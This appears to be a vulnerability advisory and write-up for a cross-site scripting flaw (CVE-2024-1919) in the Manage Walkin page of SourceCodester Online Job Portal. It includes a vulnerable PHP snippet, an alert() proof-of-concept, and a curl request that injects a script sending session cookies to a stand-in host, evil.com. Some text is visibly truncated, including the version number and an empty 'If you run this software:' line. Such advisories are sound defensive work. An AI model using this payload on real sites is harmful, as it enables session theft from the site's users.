CVE-2024-1919 - Cross-site Scripting (XSS) in SourceCodester Online Job Portal 1. – Exploit, Analysis, and Fix

---

Introduction

A security vulnerability, now tracked as CVE-2024-1919, was identified in the SourceCodester Online Job Portal 1.. The issue poses a risk of cross-site scripting (XSS) on the *Manage Walkin Page* via improper handling of user-supplied input in the Job Title parameter. This flaw allows attackers to inject malicious JavaScript, potentially compromising user sessions and stealing sensitive information. The vulnerability is identified as VDB-254854 in vulnerability databases.

This technical deep-dive explores how the bug works, provides exploitation details, and concludes with guidance on mitigation. If you manage or use this software, read on for the details you need.

Version: 1.

- File: /Employer/ManageWalkin.php

Component: Manage Walkin Page

- Vulnerability Type: Cross-Site Scripting (XSS), specifically reflected or stored (depends on implementation)

How Does the Vulnerability Work?

The vulnerability exists due to the web application’s failure to *sanitise* or *escape* the Job Title input when rendering it in the HTML response. This means that an attacker can craft input in a way that it will be interpreted as code by the browser.

If the Job Title is included directly into the HTML content (for example, in an input box's value or as text in table rows) without proper defense coding, it’s possible for a malicious actor to slip in JavaScript code.

Proof of Concept (PoC) – Exploiting the XSS

Imagine an attacker logs in as an employer and navigates to *Manage Walkin Page*. When adding a new Walkin job or editing an existing one, they provide a Job Title with embedded JavaScript.

Malicious Input Example

"><script>alert('CVE-2024-1919 XSS')</script>

How Is It Used?

1. Go to /Employer/ManageWalkin.php as an authenticated user.

Add or update a Walkin job; set the *Job Title* to the above malicious input.

3. When the job listing displays, the injected script runs – for example, showing an alert or, worse, stealing cookies or session tokens.

Code Snippet Example

Suppose the vulnerable code in /Employer/ManageWalkin.php looks like this (simplified)

// Fetch Job Title from request or database
$job_title = $_POST['jobtitle'] ?? '';

// ...
// Output Job Title directly in HTML
echo "<input type='text' name='jobtitle' value='$job_title'>";
// or
echo "<td>$job_title</td>";

No escaping means whatever is provided in $job_title is rendered as HTML. If it includes a script tag, the browser will execute it!

Real-world Danger

A successful exploit can be as simple as persuading an admin or another employer to view the page containing the malicious Job Title, leading to:

Unauthorized actions in the context of the user (CSRF, privilege escalation)

Since this is remote exploitable and published in the wild, anyone using the software in the default configuration is at risk.

Public Exploit Example

A sample request using curl to add a Walkin with a malicious Job Title (assuming session cookie):

curl -b "PHPSESSID=..." -X POST \
    -d "jobtitle=\"><script>fetch('https://evil.com/?c='+document.cookie)</script>" \
    https://targetsite/Employer/ManageWalkin.php

After this, any time the listing displays, the JavaScript executes in user’s browser.

References

- VulDB Entry VDB-254854
- CVE Details for CVE-2024-1919
- Original SourceCodester Script

Conclusion

The CVE-2024-1919 vulnerability in SourceCodester Online Job Portal 1. is real, weaponizable, and needs your attention if you’re using this software. While the bug stems from a simple coding oversight, its impact can be critical. Always validate and escape user input to avoid issues like XSS.

If you run this software:

More info

- VulDB Disclosure

Timeline

Published on: 02/27/2024 14:15:27 UTC
Last modified on: 03/21/2024 02:51:49 UTC